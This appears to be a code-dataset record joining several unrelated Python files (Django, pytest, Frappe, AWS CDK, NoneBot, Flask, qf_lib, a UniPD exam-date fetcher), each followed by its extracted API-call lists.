Two models match by uid but not by type:\n - from file: id: %s uid: %s\n - from database: id: %s uid: %s\n Please resolve manually!"""\n % (objFileTypeId, objFile.object.uid, objDbTypeId, objsdbDict[objFile.\n object.uid].uid))\n', (5596, 5905), False, 'from django.core.management.base import BaseCommand, CommandError\n'), ((8114, 8144), 'workflows.models.Category.objects.get', 'Category.objects.get', ([], {'id': 'objId'}), '(id=objId)\n', (8134, 8144), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n'), ((10651, 10703), 'workflows.models.AbstractOption.objects.filter', 'AbstractOption.objects.filter', ([], {'abstract_input': 'inp.id'}), '(abstract_input=inp.id)\n', (10680, 10703), False, 'from workflows.models import Category, AbstractWidget, AbstractInput, AbstractOutput, AbstractOption\n')] |
"""
Test checks that batcher policy is working with a metric containing a non-alphanumeric
character in the name
"""
from time import sleep
import pytest
from packaging.version import Version # noqa # pylint: disable=unused-import
from testsuite import TESTED_VERSION, rawobj # noqa # pylint: disable=unused-import
pytestmark = [
pytest.mark.skipif("TESTED_VERSION < Version('2.10')"),
pytest.mark.issue("https://issues.redhat.com/browse/THREESCALE-4913")]
BATCH_REPORT_SECONDS = 50
@pytest.fixture(scope="module")
def policy_settings():
"""Set policy settings"""
return rawobj.PolicyConfig("3scale_batcher", {"batch_report_seconds": BATCH_REPORT_SECONDS})
@pytest.fixture(scope="module")
def metric_name():
"""
    Name of a metric containing a non-alphanumeric character ('/').
"""
return "m/1"
@pytest.fixture(scope="module")
def service(service, metric_name):
"""
Creates the metric with the metric name and a mapping rule for that metric
"""
proxy = service.proxy.list()
metric = service.metrics.create(rawobj.Metric(metric_name))
# delete implicit '/' rule
proxy.mapping_rules.delete(proxy.mapping_rules.list()[0]["id"])
service.proxy.list().mapping_rules.create(rawobj.Mapping(metric, "/", "GET"))
service.proxy.list().update()
return service
def test_batcher_policy_append(api_client, application, metric_name):
"""
Test if the reported numbers of usages are correct
"""
client = api_client()
analytics = application.threescale_client.analytics
usage_before = analytics.list_by_service(
application["service_id"], metric_name=metric_name)["total"]
for i in range(3):
response = client.get("/anything")
assert response.status_code == 200, f"{i}. iteration was unsuccessful"
sleep(BATCH_REPORT_SECONDS + 1)
usage_after = analytics.list_by_service(application["service_id"],
metric_name=metric_name)["total"]
assert usage_after == usage_before + 3
| [
"testsuite.rawobj.Mapping",
"testsuite.rawobj.Metric",
"time.sleep",
"testsuite.rawobj.PolicyConfig",
"pytest.mark.skipif",
"pytest.fixture",
"pytest.mark.issue"
] | [((501, 531), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (515, 531), False, 'import pytest\n'), ((685, 715), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (699, 715), False, 'import pytest\n'), ((840, 870), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (854, 870), False, 'import pytest\n'), ((339, 393), 'pytest.mark.skipif', 'pytest.mark.skipif', (['"""TESTED_VERSION < Version(\'2.10\')"""'], {}), '("TESTED_VERSION < Version(\'2.10\')")\n', (357, 393), False, 'import pytest\n'), ((399, 468), 'pytest.mark.issue', 'pytest.mark.issue', (['"""https://issues.redhat.com/browse/THREESCALE-4913"""'], {}), "('https://issues.redhat.com/browse/THREESCALE-4913')\n", (416, 468), False, 'import pytest\n'), ((596, 685), 'testsuite.rawobj.PolicyConfig', 'rawobj.PolicyConfig', (['"""3scale_batcher"""', "{'batch_report_seconds': BATCH_REPORT_SECONDS}"], {}), "('3scale_batcher', {'batch_report_seconds':\n BATCH_REPORT_SECONDS})\n", (615, 685), False, 'from testsuite import TESTED_VERSION, rawobj\n'), ((1827, 1858), 'time.sleep', 'sleep', (['(BATCH_REPORT_SECONDS + 1)'], {}), '(BATCH_REPORT_SECONDS + 1)\n', (1832, 1858), False, 'from time import sleep\n'), ((1071, 1097), 'testsuite.rawobj.Metric', 'rawobj.Metric', (['metric_name'], {}), '(metric_name)\n', (1084, 1097), False, 'from testsuite import TESTED_VERSION, rawobj\n'), ((1246, 1280), 'testsuite.rawobj.Mapping', 'rawobj.Mapping', (['metric', '"""/"""', '"""GET"""'], {}), "(metric, '/', 'GET')\n", (1260, 1280), False, 'from testsuite import TESTED_VERSION, rawobj\n')] |
from __future__ import unicode_literals
from frappe import _
def get_data():
return [
{
"label": _("Invoices"),
"icon": "fa fa-star",
"items": [
{
"type": "doctype",
"name": "Ticket Invoice",
"description": _("Ticket Invoice")
},
{
"type": "doctype",
"name": "Tour Invoice",
"description": _("Tour Invoice")
},
{
"type": "doctype",
"name": "Proforma Ticket Invoice",
"description": _("Proforma Ticket Invoice")
},
{
"type": "doctype",
"name": "Proforma Tour Invoice",
"description": _("Proforma Tour Invoice")
}
]
},
{
"label": _("Setup"),
"icon": "fa fa-star",
"items": [
{
"type": "doctype",
"name": "Carrier Settings",
"description": _("Carrier Settings")
}
]
},
{
"label": _("Report"),
"icon": "fa fa-star",
"items": [
{
"type": "report",
"is_query_report": True,
"name": "Carrier Tickets",
"doctype": "Ticket Invoice"
},
{
"type": "report",
"is_query_report": True,
"name": "Ticket and Tour Invoice",
"doctype": "Ticket Invoice"
},
]
}
]
| [
"frappe._"
] | [((104, 117), 'frappe._', '_', (['"""Invoices"""'], {}), "('Invoices')\n", (105, 117), False, 'from frappe import _\n'), ((643, 653), 'frappe._', '_', (['"""Setup"""'], {}), "('Setup')\n", (644, 653), False, 'from frappe import _\n'), ((831, 842), 'frappe._', '_', (['"""Report"""'], {}), "('Report')\n", (832, 842), False, 'from frappe import _\n'), ((239, 258), 'frappe._', '_', (['"""Ticket Invoice"""'], {}), "('Ticket Invoice')\n", (240, 258), False, 'from frappe import _\n'), ((345, 362), 'frappe._', '_', (['"""Tour Invoice"""'], {}), "('Tour Invoice')\n", (346, 362), False, 'from frappe import _\n'), ((460, 488), 'frappe._', '_', (['"""Proforma Ticket Invoice"""'], {}), "('Proforma Ticket Invoice')\n", (461, 488), False, 'from frappe import _\n'), ((584, 610), 'frappe._', '_', (['"""Proforma Tour Invoice"""'], {}), "('Proforma Tour Invoice')\n", (585, 610), False, 'from frappe import _\n'), ((777, 798), 'frappe._', '_', (['"""Carrier Settings"""'], {}), "('Carrier Settings')\n", (778, 798), False, 'from frappe import _\n')] |
import os
import aws_cdk as cdk
from pydantic import BaseSettings
class Config(BaseSettings):
# Project
account_id: str = ''
project_name: str = 'aws-cdk-demo'
region: str = 'ap-northeast-1'
env: str = 'dev' if not os.getenv('ENV') else os.getenv('ENV')
stack_env = cdk.Environment(account=account_id, region=region)
config = Config()
| [
"os.getenv",
"aws_cdk.Environment"
] | [((305, 355), 'aws_cdk.Environment', 'cdk.Environment', ([], {'account': 'account_id', 'region': 'region'}), '(account=account_id, region=region)\n', (320, 355), True, 'import aws_cdk as cdk\n'), ((271, 287), 'os.getenv', 'os.getenv', (['"""ENV"""'], {}), "('ENV')\n", (280, 287), False, 'import os\n'), ((249, 265), 'os.getenv', 'os.getenv', (['"""ENV"""'], {}), "('ENV')\n", (258, 265), False, 'import os\n')] |
import random
from nonebot import on_message
from nonebot.adapters.cqhttp import Bot, GroupMessageEvent, MessageSegment
from nonebot.adapters.cqhttp.permission import GROUP
from nonebot.plugin import export
from . import data_source as source
export = export()
export.plugin_name = '自动插话'  # display name: "auto interjection"
export.plugin_command = "无"  # command: "none"
export.plugin_usage = '让机器人自动插话。'  # usage: "lets the bot interject in group chat automatically"
export.default_status = False  # plugin default on/off switch
export.ignore = False  # whether the plugin manager ignores this plugin
message = on_message(permission=GROUP, priority=99, block=True)
@message.handle()
async def _(bot: Bot, event: GroupMessageEvent):
'''
    Handle the bot's automatic interjections in group chat.
    '''
    # decide randomly whether to interject, based on the group's activity setting
bot_id = int(bot.self_id)
num = random.randrange(100)
active = await source.get_active(bot_id, event.group_id)
if num > active:
await message.finish()
    # fetch a random quip from the data source
text = await source.get_saohua()
num = random.randrange(100)
if num < 20:
        # sometimes convert the text to a voice message
voice_str = await source.get_voice(text)
if voice_str is not None:
msg = MessageSegment.record(voice_str)
await message.finish(msg)
msg = MessageSegment.text(text)
await message.finish(msg)
| [
"nonebot.on_message",
"random.randrange",
"nonebot.adapters.cqhttp.MessageSegment.record",
"nonebot.adapters.cqhttp.MessageSegment.text",
"nonebot.plugin.export"
] | [((255, 263), 'nonebot.plugin.export', 'export', ([], {}), '()\n', (261, 263), False, 'from nonebot.plugin import export\n'), ((442, 495), 'nonebot.on_message', 'on_message', ([], {'permission': 'GROUP', 'priority': '(99)', 'block': '(True)'}), '(permission=GROUP, priority=99, block=True)\n', (452, 495), False, 'from nonebot import on_message\n'), ((645, 666), 'random.randrange', 'random.randrange', (['(100)'], {}), '(100)\n', (661, 666), False, 'import random\n'), ((841, 862), 'random.randrange', 'random.randrange', (['(100)'], {}), '(100)\n', (857, 862), False, 'import random\n'), ((1080, 1105), 'nonebot.adapters.cqhttp.MessageSegment.text', 'MessageSegment.text', (['text'], {}), '(text)\n', (1099, 1105), False, 'from nonebot.adapters.cqhttp import Bot, GroupMessageEvent, MessageSegment\n'), ((998, 1030), 'nonebot.adapters.cqhttp.MessageSegment.record', 'MessageSegment.record', (['voice_str'], {}), '(voice_str)\n', (1019, 1030), False, 'from nonebot.adapters.cqhttp import Bot, GroupMessageEvent, MessageSegment\n')] |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
"""
import os
# from flask_cors import CORS
from api import create_app
from config import configuration
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
# CORS(app, supports_credentials=True)
if __name__ == '__main__':
host, port, debug = configuration.get_start_config()
app.run(host=host, port=port, debug=eval(debug))
| [
"config.configuration.get_start_config",
"os.getenv"
] | [((299, 331), 'config.configuration.get_start_config', 'configuration.get_start_config', ([], {}), '()\n', (329, 331), False, 'from config import configuration\n'), ((169, 194), 'os.getenv', 'os.getenv', (['"""FLASK_CONFIG"""'], {}), "('FLASK_CONFIG')\n", (178, 194), False, 'import os\n')] |
# 14/01/2018
from itertools import permutations
import time
def cryptarithmetic_solver(puzzle):
'''
Solves cryptarithms using brute-force.
Notes: eval() is frowned upon + direct translation is very expensive.
'''
start = time.perf_counter()
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
leading = list(set(c[0] for c in puzzle.split() if c[0] in alphabet))
letters = list(set([c for c in puzzle if c in alphabet]))
for attempt in permutations("0123456789", len(letters)):
attempt = {k: v for k, v in zip(letters, attempt)}
if any([attempt[k] == '0' for k in leading]):
continue
elif eval(''.join([attempt[k] if k in letters else k for k in puzzle])):
print("Time taken: {:.2f} seconds".format(time.perf_counter() - start))
return '{' + ', '.join(sorted(['"{}"=>{}'.format(k, attempt[k]) for k in attempt])) + '}'
| [
"time.perf_counter"
] | [((242, 261), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (259, 261), False, 'import time\n'), ((772, 791), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (789, 791), False, 'import time\n')] |
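An example call for the solver above; SEND + MORE == MONEY has the well-known unique assignment, though the brute-force search can take a noticeable amount of time:

print(cryptarithmetic_solver("SEND + MORE == MONEY"))
# -> {"D"=>7, "E"=>5, "M"=>1, "N"=>6, "O"=>0, "R"=>8, "S"=>9, "Y"=>2}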
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from qf_lib.analysis.rolling_analysis.rolling_analysis import RollingAnalysisFactory
from qf_lib.analysis.tearsheets.abstract_tearsheet import AbstractTearsheet
from qf_lib.common.enums.grid_proportion import GridProportion
from qf_lib.common.enums.plotting_mode import PlottingMode
from qf_lib.containers.series.qf_series import QFSeries
from qf_lib.documents_utils.document_exporting.element.grid import GridElement
from qf_lib.documents_utils.document_exporting.element.new_page import NewPageElement
from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement
from qf_lib.documents_utils.document_exporting.element.table import Table
from qf_lib.plotting.charts.regression_chart import RegressionChart
from qf_lib.plotting.charts.returns_heatmap_chart import ReturnsHeatmapChart
from qf_lib.plotting.helpers.create_returns_bar_chart import create_returns_bar_chart
from qf_lib.plotting.helpers.create_returns_distribution import create_returns_distribution
from qf_lib.settings import Settings
class TearsheetComparative(AbstractTearsheet):
"""Creates a PDF report, which additionally contains a benchamrk.
Can be used with or without the benchmark
Parameters
----------
settings: Settings
settings of the project
pdf_exporter: PDFExporter
tool that creates the pdf with the result
strategy_series: QFSeries
timeseries of the trading of the strategy
benchmark_series: QFSeries
timeseries of the benchmark
live_date: datetime
if set it is used to generate the cone chart
title: str
title of the document
"""
def __init__(self, settings: Settings, pdf_exporter, strategy_series: QFSeries, benchmark_series: QFSeries,
live_date: datetime = None, title: str = "Strategy Analysis"):
super().__init__(settings, pdf_exporter, strategy_series, live_date, title)
self.benchmark_series = benchmark_series
def build_document(self):
series_list = [self.strategy_series, self.benchmark_series]
# First Page
self._add_header()
self._add_perf_chart(series_list)
self._add_relative_performance_chart(self.strategy_series, self.benchmark_series)
self._add_statistics_table(series_list)
# Next Page
self.document.add_element(NewPageElement())
self._add_header()
self.document.add_element(ParagraphElement("\n"))
self._add_returns_statistics_charts(self.strategy_series)
self._add_returns_statistics_charts(self.benchmark_series)
self.document.add_element(ParagraphElement("\n"))
self.document.add_element(ParagraphElement("\n"))
self._add_ret_distribution_and_similarity()
# Next Page
self.document.add_element(NewPageElement())
self._add_header()
self.document.add_element(ParagraphElement("\n"))
self.document.add_element(ParagraphElement("\n"))
self._add_rolling_return_chart(series_list)
self.document.add_element(ParagraphElement("\n"))
self.document.add_element(ParagraphElement("\n"))
self._add_rolling_vol_chart(series_list)
def _add_returns_statistics_charts(self, series):
grid = self._get_new_grid()
# Monthly returns heatmap
heatmap_chart = ReturnsHeatmapChart(series, title="Monthly Returns - {}".format(series.name))
grid.add_chart(heatmap_chart)
# Annual returns bar chart
annual_ret_chart = create_returns_bar_chart(series, title="Annual Returns - {}".format(series.name))
grid.add_chart(annual_ret_chart)
self.document.add_element(grid)
def _add_ret_distribution_and_similarity(self):
grid = GridElement(mode=PlottingMode.PDF,
figsize=self.half_image_size, dpi=self.dpi)
# Distribution of Monthly Returns
chart = create_returns_distribution(self.strategy_series)
grid.add_chart(chart)
# Regression chart
chart = RegressionChart(self.benchmark_series, self.strategy_series)
grid.add_chart(chart)
# Distribution of Monthly Returns
chart = create_returns_distribution(self.benchmark_series)
grid.add_chart(chart)
# Regression chart
chart = RegressionChart(self.strategy_series, self.benchmark_series)
grid.add_chart(chart)
self.document.add_element(grid)
def _add_rolling_table(self):
dtos = RollingAnalysisFactory.calculate_analysis(self.strategy_series, self.benchmark_series)
column_names = [
Table.ColumnCell("Rolling Return Period", css_class="left-align"),
"Strategy Average",
"Strategy Worst",
Table.ColumnCell("Strategy Best", css_class="right-align"),
"Benchmark Average",
"Benchmark Worst",
Table.ColumnCell("Benchmark Best", css_class="right-align"),
Table.ColumnCell("% Strategy outperform Benchmark")]
result = Table(column_names, grid_proportion=GridProportion.Sixteen, css_class="table rolling-table")
for dto in dtos:
result.add_row([Table.Cell(dto.period, css_class="right-align"),
Table.Cell(dto.strategy_average, "{:.2%}"),
Table.Cell(dto.strategy_worst, "{:.2%}"),
Table.Cell(dto.strategy_best, "{:.2%}"),
Table.Cell(dto.benchmark_average, "{:.2%}"),
Table.Cell(dto.benchmark_worst, "{:.2%}"),
Table.Cell(dto.benchmark_best, "{:.2%}"),
Table.Cell(dto.percentage_difference, "{:.2%}")])
self.document.add_element(result)
| [
"qf_lib.documents_utils.document_exporting.element.table.Table.ColumnCell",
"qf_lib.plotting.helpers.create_returns_distribution.create_returns_distribution",
"qf_lib.documents_utils.document_exporting.element.table.Table.Cell",
"qf_lib.documents_utils.document_exporting.element.new_page.NewPageElement",
"qf_lib.plotting.charts.regression_chart.RegressionChart",
"qf_lib.documents_utils.document_exporting.element.grid.GridElement",
"qf_lib.documents_utils.document_exporting.element.table.Table",
"qf_lib.analysis.rolling_analysis.rolling_analysis.RollingAnalysisFactory.calculate_analysis",
"qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement"
] | [((4439, 4517), 'qf_lib.documents_utils.document_exporting.element.grid.GridElement', 'GridElement', ([], {'mode': 'PlottingMode.PDF', 'figsize': 'self.half_image_size', 'dpi': 'self.dpi'}), '(mode=PlottingMode.PDF, figsize=self.half_image_size, dpi=self.dpi)\n', (4450, 4517), False, 'from qf_lib.documents_utils.document_exporting.element.grid import GridElement\n'), ((4603, 4652), 'qf_lib.plotting.helpers.create_returns_distribution.create_returns_distribution', 'create_returns_distribution', (['self.strategy_series'], {}), '(self.strategy_series)\n', (4630, 4652), False, 'from qf_lib.plotting.helpers.create_returns_distribution import create_returns_distribution\n'), ((4727, 4787), 'qf_lib.plotting.charts.regression_chart.RegressionChart', 'RegressionChart', (['self.benchmark_series', 'self.strategy_series'], {}), '(self.benchmark_series, self.strategy_series)\n', (4742, 4787), False, 'from qf_lib.plotting.charts.regression_chart import RegressionChart\n'), ((4877, 4927), 'qf_lib.plotting.helpers.create_returns_distribution.create_returns_distribution', 'create_returns_distribution', (['self.benchmark_series'], {}), '(self.benchmark_series)\n', (4904, 4927), False, 'from qf_lib.plotting.helpers.create_returns_distribution import create_returns_distribution\n'), ((5002, 5062), 'qf_lib.plotting.charts.regression_chart.RegressionChart', 'RegressionChart', (['self.strategy_series', 'self.benchmark_series'], {}), '(self.strategy_series, self.benchmark_series)\n', (5017, 5062), False, 'from qf_lib.plotting.charts.regression_chart import RegressionChart\n'), ((5184, 5275), 'qf_lib.analysis.rolling_analysis.rolling_analysis.RollingAnalysisFactory.calculate_analysis', 'RollingAnalysisFactory.calculate_analysis', (['self.strategy_series', 'self.benchmark_series'], {}), '(self.strategy_series, self.\n benchmark_series)\n', (5225, 5275), False, 'from qf_lib.analysis.rolling_analysis.rolling_analysis import RollingAnalysisFactory\n'), ((5729, 5826), 'qf_lib.documents_utils.document_exporting.element.table.Table', 'Table', (['column_names'], {'grid_proportion': 'GridProportion.Sixteen', 'css_class': '"""table rolling-table"""'}), "(column_names, grid_proportion=GridProportion.Sixteen, css_class=\n 'table rolling-table')\n", (5734, 5826), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((3037, 3053), 'qf_lib.documents_utils.document_exporting.element.new_page.NewPageElement', 'NewPageElement', ([], {}), '()\n', (3051, 3053), False, 'from qf_lib.documents_utils.document_exporting.element.new_page import NewPageElement\n'), ((3116, 3138), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3132, 3138), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3309, 3331), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3325, 3331), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3367, 3389), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3383, 3389), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3498, 3514), 'qf_lib.documents_utils.document_exporting.element.new_page.NewPageElement', 'NewPageElement', ([], {}), '()\n', (3512, 3514), False, 'from 
qf_lib.documents_utils.document_exporting.element.new_page import NewPageElement\n'), ((3578, 3600), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3594, 3600), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3636, 3658), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3652, 3658), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3748, 3770), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3764, 3770), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((3806, 3828), 'qf_lib.documents_utils.document_exporting.element.paragraph.ParagraphElement', 'ParagraphElement', (['"""\n"""'], {}), "('\\n')\n", (3822, 3828), False, 'from qf_lib.documents_utils.document_exporting.element.paragraph import ParagraphElement\n'), ((5309, 5374), 'qf_lib.documents_utils.document_exporting.element.table.Table.ColumnCell', 'Table.ColumnCell', (['"""Rolling Return Period"""'], {'css_class': '"""left-align"""'}), "('Rolling Return Period', css_class='left-align')\n", (5325, 5374), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((5450, 5508), 'qf_lib.documents_utils.document_exporting.element.table.Table.ColumnCell', 'Table.ColumnCell', (['"""Strategy Best"""'], {'css_class': '"""right-align"""'}), "('Strategy Best', css_class='right-align')\n", (5466, 5508), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((5586, 5645), 'qf_lib.documents_utils.document_exporting.element.table.Table.ColumnCell', 'Table.ColumnCell', (['"""Benchmark Best"""'], {'css_class': '"""right-align"""'}), "('Benchmark Best', css_class='right-align')\n", (5602, 5645), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((5659, 5710), 'qf_lib.documents_utils.document_exporting.element.table.Table.ColumnCell', 'Table.ColumnCell', (['"""% Strategy outperform Benchmark"""'], {}), "('% Strategy outperform Benchmark')\n", (5675, 5710), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((5876, 5923), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.period'], {'css_class': '"""right-align"""'}), "(dto.period, css_class='right-align')\n", (5886, 5923), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((5953, 5995), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.strategy_average', '"""{:.2%}"""'], {}), "(dto.strategy_average, '{:.2%}')\n", (5963, 5995), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6025, 6065), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.strategy_worst', '"""{:.2%}"""'], {}), "(dto.strategy_worst, '{:.2%}')\n", (6035, 6065), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6095, 6134), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.strategy_best', '"""{:.2%}"""'], {}), "(dto.strategy_best, '{:.2%}')\n", (6105, 6134), False, 'from 
qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6164, 6207), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.benchmark_average', '"""{:.2%}"""'], {}), "(dto.benchmark_average, '{:.2%}')\n", (6174, 6207), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6237, 6278), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.benchmark_worst', '"""{:.2%}"""'], {}), "(dto.benchmark_worst, '{:.2%}')\n", (6247, 6278), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6308, 6348), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.benchmark_best', '"""{:.2%}"""'], {}), "(dto.benchmark_best, '{:.2%}')\n", (6318, 6348), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n'), ((6378, 6425), 'qf_lib.documents_utils.document_exporting.element.table.Table.Cell', 'Table.Cell', (['dto.percentage_difference', '"""{:.2%}"""'], {}), "(dto.percentage_difference, '{:.2%}')\n", (6388, 6425), False, 'from qf_lib.documents_utils.document_exporting.element.table import Table\n')] |
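For reference, every numeric cell in the rolling table above goes through Python's percent format spec, so a raw fraction renders as a percentage with two decimals. A one-line illustration (the value is made up):

# --- format-spec illustration for the "{:.2%}" cells in the rolling table above ---
print("{:.2%}".format(0.03419))  # -> '3.42%'
# --- end illustration ---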
#!/usr/bin/env python3
# Find dates for exams at UniPD
"""
Copyright 2022 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys, csv, requests, datetime, json
from queue import PriorityQueue
# CSV file with all the desired courses
# The first column must be the course code
COURSES_LIST = sys.argv[1] if len(sys.argv) == 2 else "courses.csv"
# Dates where to find exams
today = datetime.date.today()
BEGIN_DATE = today.strftime("%d-%m-%Y")
END_DATE = (today + datetime.timedelta(days = 2 * 30)).strftime("%d-%m-%Y")
class Exam:
def __init__(self, code, *data):
self.code = code.strip()
self.data = [value.strip() for value in data]
def __lt__(self, other):
return self.code.__lt__(other.code)
def __str__(self):
return ', '.join([self.code] + self.data)
exams = []
with open(COURSES_LIST, newline='') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
for row in spamreader:
exams.append(Exam(*row))
exam_dates = PriorityQueue()
tot = len(exams)
for i, exam in enumerate(exams):
data = json.loads(requests.post("https://agendastudentiunipd.easystaff.it/test_call.php", {
"et_er" : "1",
"esami_insegnamento" : exam.code,
"datefrom" : BEGIN_DATE,
"dateto" : END_DATE,
}).text)
print(f"{i+1}/{tot}\t{exam.code}", file=sys.stderr)
for i in (ins := data["Insegnamenti"]):
for app in ins[i]["Appelli"]:
exam_dates.put((
datetime.datetime.strptime(app["Data"], '%d-%m-%Y'),
exam
))
last = [None, Exam("")]
while not exam_dates.empty():
app = exam_dates.get()
if last[0] != app[0] or last[1].code != app[1].code:
print(app[0].strftime("%d/%m/%Y"), str(app[1]))
last = app
| [
"requests.post",
"datetime.datetime.strptime",
"datetime.timedelta",
"queue.PriorityQueue",
"datetime.date.today",
"csv.reader"
] | [((876, 897), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (895, 897), False, 'import sys, csv, requests, datetime, json\n'), ((1472, 1487), 'queue.PriorityQueue', 'PriorityQueue', ([], {}), '()\n', (1485, 1487), False, 'from queue import PriorityQueue\n'), ((1354, 1403), 'csv.reader', 'csv.reader', (['csvfile'], {'delimiter': '""","""', 'quotechar': '"""\\""""'}), '(csvfile, delimiter=\',\', quotechar=\'"\')\n', (1364, 1403), False, 'import sys, csv, requests, datetime, json\n'), ((958, 989), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(2 * 30)'}), '(days=2 * 30)\n', (976, 989), False, 'import sys, csv, requests, datetime, json\n'), ((1559, 1732), 'requests.post', 'requests.post', (['"""https://agendastudentiunipd.easystaff.it/test_call.php"""', "{'et_er': '1', 'esami_insegnamento': exam.code, 'datefrom': BEGIN_DATE,\n 'dateto': END_DATE}"], {}), "('https://agendastudentiunipd.easystaff.it/test_call.php', {\n 'et_er': '1', 'esami_insegnamento': exam.code, 'datefrom': BEGIN_DATE,\n 'dateto': END_DATE})\n", (1572, 1732), False, 'import sys, csv, requests, datetime, json\n'), ((1920, 1971), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (["app['Data']", '"""%d-%m-%Y"""'], {}), "(app['Data'], '%d-%m-%Y')\n", (1946, 1971), False, 'import sys, csv, requests, datetime, json\n')] |
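The `__lt__` method on `Exam` above is not decorative: the priority queue holds `(datetime, Exam)` tuples, and when two appointments fall on the same date, tuple comparison falls through to the second element, so `Exam` must be orderable or `PriorityQueue` raises `TypeError`. A stdlib-only sketch of that tie-break (course codes and the date are made up):

# --- illustration: tie-breaking equal dates via __lt__ (toy data, not part of the script above) ---
import datetime
from queue import PriorityQueue

class Item:
    def __init__(self, code):
        self.code = code
    def __lt__(self, other):      # plays the same role as Exam.__lt__
        return self.code < other.code

q = PriorityQueue()
same_day = datetime.datetime(2022, 6, 15)
q.put((same_day, Item("SCP7079299")))
q.put((same_day, Item("SCP7079298")))  # equal first elements -> Item.__lt__ decides
print(q.get()[1].code)            # SCP7079298
# --- end illustration ---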
import os
from dotenv import load_dotenv
load_dotenv()
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# use this flag to enable mysql
# only in production we use mysql
# for dev and testing we will use sqlite
MYSQL = bool(os.getenv("MYSQL", False))
MYSQL_DATABASE = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': os.environ["DB_NAME"],
'USER': os.environ["DB_USERNAME"],
'PASSWORD': os.environ["DB_PASSWORD"],
'HOST': os.environ['DB_HOST'],
'PORT': '',
}
}
SQLITE_DATABASE = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
def get_db_config():
if MYSQL:
return MYSQL_DATABASE
return SQLITE_DATABASE
| [
"os.path.abspath",
"os.path.join",
"os.getenv",
"dotenv.load_dotenv"
